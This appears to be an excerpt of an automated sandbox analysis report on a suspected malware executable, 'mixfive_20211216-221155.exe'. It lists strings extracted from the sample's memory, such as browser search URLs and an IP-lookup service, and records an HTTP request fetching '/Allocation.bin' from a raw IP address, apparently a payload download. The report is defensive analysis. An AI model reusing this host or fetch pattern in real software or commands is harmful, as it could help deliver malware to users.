                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005631729.000000001E7BC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://www.digicert.com/CPS0
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://get.adob
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://helpx.ad
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: mixfive_20211216-221155.exe | String found in binary or memory: https://www.digicert.com/CPS0
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: global traffic | HTTP traffic detected: GET /Allocation.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 185.112.83.8 Cache-Control: no-cache
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exe | Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
                        Source: mixfive_20211216-221155.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
